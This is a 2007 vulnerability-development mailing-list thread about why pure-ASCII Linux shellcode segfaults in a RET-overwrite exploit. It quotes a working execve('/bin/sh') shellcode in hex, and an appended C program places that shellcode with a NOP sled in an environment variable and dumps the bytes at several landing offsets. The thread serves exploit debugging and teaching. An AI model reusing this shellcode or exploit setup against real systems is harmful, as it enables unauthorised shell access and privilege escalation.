Vulnerability Development: Re: Re: Linux restricted ASCII Shellcode

Re: Re: Linux restricted ASCII Shellcode

From: Deian Stefan <deianstefan_at_gmail.com>
Date: Sun, 22 Apr 2007 23:56:02 -0400

What I meant by the word alignment is that you might have something like:
\x90\xeb\x1f\x5e instead of \xeb\x1f\x5e\x89 -- this will segfault
and is due to the number of NOPs.

Can you run this through gdb (or some other disassembler) and show me
the hex shellcode in memory?

On 22 Apr 2007 10:42:24 -0000, nonexistant_at_nospam.org
<nonexistant_at_nospam.org> wrote:
> Yes I'm having a seg-fault, but I can't catch you...
> AFAIK when EIP is pointing somewhere in the NOP sled, no matter how the shellcode is aligned... Alignment has nothing to do here...?¿? Am I wrong?
> Moreover, I've tried more than 5 different ASCII shellcodes, all with the same result... Always segfaulting. It looks as if the shellcodes were not working for some common reason...
> So, summarizing:
> 1.- I can perfectly overwrite RET, thus having EIP pointing almost 100% of the time to the NOPs of my shellcode (in an environment variable)
> 2.- My -non-ascii- shellcode works perfectly
> 3.- When I try with ANY pure ascii shellcode, it fails 100% of the time.
>
> What is happening?
>
> I've tried with pure ASCII shellcodes ripped from http://shellcode.org/Shellcode/linux/ascii/ among others...
>
> Metasploit framework failed to convert the original shellcode -the one that works- to pure ascii with the selected charset (A-Z,a-z,0-9).
>
> That's the original shellcode:
>
> \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
>
> Is anyone able to convert this to pure ASCII or giving me a working pure ASCII shellcode or helping me understand why all the pure ascii shellcodes are failing in my exploit?
>
> Thank you,
>

-- 
Deian Stefan
GPG fingerprint: BED8 F536 3CDB AC28 CCBB  2ECE 66C3 5810 9025 23CF
Received on Apr 22 2007
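The two checks the reply asks for, as an added example that is not part of either poster's mail: it takes the 45-byte execve("/bin/sh") shellcode quoted above, counts how many of its bytes fall outside the A-Z a-z 0-9 charset the poster asked Metasploit for (which is why that conversion fails), then places a sled plus shellcode in an environment variable and dumps the bytes at a few candidate landing offsets, so that "\x90\xeb\x1f\x5e" versus "\xeb\x1f\x5e\x89" can be seen without a debugger. The variable name EGG, the sled length of 16 and the use of 'A' (0x41, inc ecx in 32-bit mode) as a one-byte ASCII sled instruction are assumptions of this example. Nothing is executed; the code only inspects bytes.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The 45-byte execve("/bin/sh") shellcode quoted in the thread (32-bit Linux, int 0x80). */
static const unsigned char SHELLCODE[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define SHELLCODE_LEN (sizeof(SHELLCODE) - 1)

/* Count bytes outside the A-Z a-z 0-9 charset the poster requested from Metasploit.
 * Any non-zero result means the payload cannot be used unencoded in that charset. */
size_t count_disallowed(const unsigned char *buf, size_t n)
{
    size_t bad = 0;
    for (size_t i = 0; i < n; i++)
        if (!isalnum(buf[i]))
            bad++;
    return bad;
}

/* Build <sled><shellcode> and export it as EGG=... (assumed name), the way the
 * poster places his payload in an environment variable.  The sled byte is 0x90
 * (nop) or, for a pure-ASCII sled, 'A' (0x41 = inc ecx, a one-byte instruction).
 * Returns a pointer to the copy that now lives in the process environment, i.e.
 * the bytes a debugger would show at the address the overwritten RET points to. */
unsigned char *place_in_env(size_t sled_len, int ascii_sled, size_t *total_len)
{
    size_t total = sled_len + SHELLCODE_LEN;
    unsigned char *tmp = malloc(total + 1);
    if (!tmp)
        return NULL;
    memset(tmp, ascii_sled ? 'A' : 0x90, sled_len);
    memcpy(tmp + sled_len, SHELLCODE, SHELLCODE_LEN);
    tmp[total] = '\0';                 /* the payload has no NUL, so setenv copies it whole */
    int rc = setenv("EGG", (char *)tmp, 1);
    free(tmp);
    if (rc != 0)
        return NULL;
    if (total_len)
        *total_len = total;
    return (unsigned char *)getenv("EGG");
}

/* The four bytes the CPU fetches first if EIP lands at payload + offset, packed
 * in memory order so that 0xeb1f5e89 reads like "\xeb\x1f\x5e\x89". */
uint32_t bytes_at(const unsigned char *payload, size_t offset)
{
    const unsigned char *p = payload + offset;
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Landing anywhere in a sled of one-byte instructions, or exactly at the
 * shellcode start, decodes as intended; one byte further starts mid-instruction. */
int landing_ok(size_t sled_len, size_t total_len, size_t offset)
{
    return offset < total_len && offset <= sled_len;
}

/* Hex dump around a landing point: the check the reply asks the poster to do in gdb. */
void dump_landing(const unsigned char *payload, size_t sled_len, size_t total_len,
                  size_t offset, size_t n)
{
    printf("offset %3zu:", offset);
    for (size_t i = offset; i < offset + n && i < total_len; i++)
        printf(" %02x", payload[i]);
    printf("  (%s)\n", landing_ok(sled_len, total_len, offset) ? "ok" : "misaligned");
}

int main(void)
{
    size_t total;
    unsigned char *egg = place_in_env(16, 0, &total);
    if (!egg)
        return 1;
    printf("bytes outside A-Za-z0-9 in the original shellcode: %zu of %zu\n",
           count_disallowed(SHELLCODE, SHELLCODE_LEN), SHELLCODE_LEN);
    dump_landing(egg, 16, total, 15, 4);   /* last sled byte:  90 eb 1f 5e */
    dump_landing(egg, 16, total, 16, 4);   /* shellcode start: eb 1f 5e 89 */
    dump_landing(egg, 16, total, 17, 4);   /* one byte late:   1f 5e 89 76 */
    return 0;
}
```

In a real exploit the address written over RET is computed from the environment layout rather than taken from getenv(), so the offset argument here stands for "RET minus the start of the payload"; comparing the dumped bytes at that offset against the first bytes of the shellcode is the alignment check the reply describes.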